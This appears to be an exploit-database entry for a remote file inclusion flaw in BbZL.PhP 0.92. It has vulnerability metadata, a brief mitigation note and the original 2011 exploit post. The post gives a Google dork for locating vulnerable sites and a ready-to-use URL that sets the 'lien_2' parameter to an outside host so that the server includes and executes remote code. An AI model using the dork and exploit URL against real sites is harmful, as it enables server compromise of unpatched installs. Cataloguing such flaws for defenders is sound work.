BbZL.PhP File Inclusion Exploit

vendor:

BbZL.PhP

by:

Number 7

7.5

CVSS

HIGH

File Inclusion

CWE

Product Name: BbZL.PhP

Affected Version From: 0.92 CSS²

Affected Version To: 0.92 CSS²

Patch Exists: NO

Related CWE: N/A

CPE: a:easy-script:bbzl_php:0.92_css2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux/Windows NT

2011

BbZL.PhP File Inclusion Exploit

BbZL.PhP is vulnerable to remote file inclusion. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable parameter 'lien_2' in the index.php file. This can allow the attacker to execute arbitrary code on the server.

Mitigation:

Ensure that user input is validated and filtered before being used in a file inclusion context. This can be done by using a whitelist of allowed characters and rejecting any input that does not match the whitelist.

Source

Exploit-DB raw data:

 _________________________________________________________________________________________
|                           _              _                                              |
| ||\\      || ||       || | \\          // |  ____      ________           __________    |
| || \\     || ||       || | |\\        //| | |     \   |  ______|         |_______/ /    |
| ||  \\    || ||       || | | \\      // | | |  _   \  | |                       / /     |
| ||   \\   || ||       || | |  \\    //  | | | |_)  |  | |______    /\`'__\     / /      |
| ||    \\  || ||       || | |   \\  //   | | |  _  <   |  ______|   \ \ \/     / /       |
| ||     \\ || ||_______|| | |    \\//    | | | |_)  |  | |______     \ \_\    / /        |
| ||      \\|| |_________| |_|     \/     |_| |_____/   |________|     \/_/   /_/         |
|_________________________________________________________________________________________|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Exploit Title: [BbZL.PhP File Inclusion Exploit]
# Google Dork: [intitle:"BbZL.PhP 0.92 CSS²"]
# Date: [06/07/2011]
# Author: [Number 7]
# Software Link: [http://www.easy-script.com/scripts-dl/bbzl_PhP_092.zip]
# Version: [0.92 CSS²]
# Tested on: [linux/Windows NT]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exp: http://www.site.tn/path/index.php?type=3&lien_2=http://site.com.tn/



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
GreetZ:S-man // Wx // Alen // M@TaDoR // LastBreath1 // all Tunisian Hackers